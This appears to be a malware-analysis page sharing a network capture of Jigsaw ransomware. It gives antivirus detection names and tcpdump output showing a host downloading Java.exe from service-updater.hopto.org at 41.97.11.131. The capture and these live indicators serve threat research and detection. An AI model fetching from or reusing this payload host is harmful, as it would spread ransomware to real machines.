Jigsaw Ransomware Malware Crimeware PCAP File Download Traffic Sample

Avast

FileRepMetagen [Malware]

AVG

FileRepMetagen [Malware]

Avira (no cloud)

Malwarebytes

Ransom.Jigsaw

McAfee-GW-Edition

BehavesLike.Win32.Ransomware.dc

Microsoft

Trojan:Win32/Occamy.C

When executed this ransomware has NO C2 it uses an e-mail address with directions as pictured below:

2020-05-01 16:19:09.841147 IP 192.168.86.1.53 > 192.168.86.25.59527: 12228 1/0/0 A 41.97.11.131 (59)
E..W..@.@.if..V…V..5…C.p/…………service-updater.hopto.org…………..;..)a..
2020-05-01 16:19:09.841596 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [S], seq 1891890631, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4f^@…H…V.)a…!.Pp……… ..s…………..
2020-05-01 16:19:10.021362 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [S.], seq 2051894246, ack 1891890632, win 8192, options [mss 1340,nop,wscale 8,nop,nop,sackOK], length 0
E..4Q.@.*..p)a….V..P.!zMk.p….. ……..<…….. 2020-05-01 16:19:10.021569 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [.], ack 1, win 16415, length 0
E..(f_@…H…V.)a…!.Pp…zMk.P.@………..
2020-05-01 16:19:10.022040 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [P.], seq 1:408, ack 1, win 16415, length 407: HTTP: GET /Java.exe HTTP/1.1
E…f`@…G3..V.)a…!.Pp…zMk.P.@…..GET /Java.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: service-updater.hopto.org
Connection: Keep-Alive

2020-05-01 16:19:10.205818 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [.], ack 408, win 256, length 0
E..(Q.@...{)a….V..P.!zMk.p.._P…Me…….. 2020-05-01 16:19:10.227305 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [.], seq 1:1341, ack 408, win 256, length 1340: HTTP: HTTP/1.1 200 OK E..dQ.@...>)a….V..P.!zMk.p.._P…….HTTP/1.1 200 OK
Date: Fri, 01 May 2020 20:19:30 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
Last-Modified: Fri, 01 May 2020 01:06:35 GMT
ETag: “48e00-5a48bcaeea16d”
Accept-Ranges: bytes
Content-Length: 298496
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2020-05-01 16:23:07.891876 IP 192.168.86.25.50993 > 172.217.13.227.80: Flags [P.], seq 1:560, ack 1, win 16560, length 559: HTTP: POST /service/update2?cup2key=10:78626
2356&cup2hreq=b991085be0dfd36bb56c286a65a7bfd50726b800dd7d6bc969c5f8cc18493bf2 HTTP/1.1
E..Wg.@…….V……1.P…I..T.P.@..k..POST /service/update2?cup2key=10:786262356&cup2hreq=b991085be0dfd36bb56c286a65a7bfd50726b800dd7d6bc969c5f8cc18493bf2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Google Update/1.3.35.452;winhttp;cup-ecdsa
X-Goog-Update-AppId: {430FD4D0-B729-4F61-AA34-91526481799D},{8A69D345-D564-463C-AFF1-A69D9E530F96}
X-Goog-Update-Updater: Omaha-1.3.35.452
X-Goog-Update-Interactivity: bg
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Content-Length: 1097
Host: update.googleapis.com

Please follow and like us: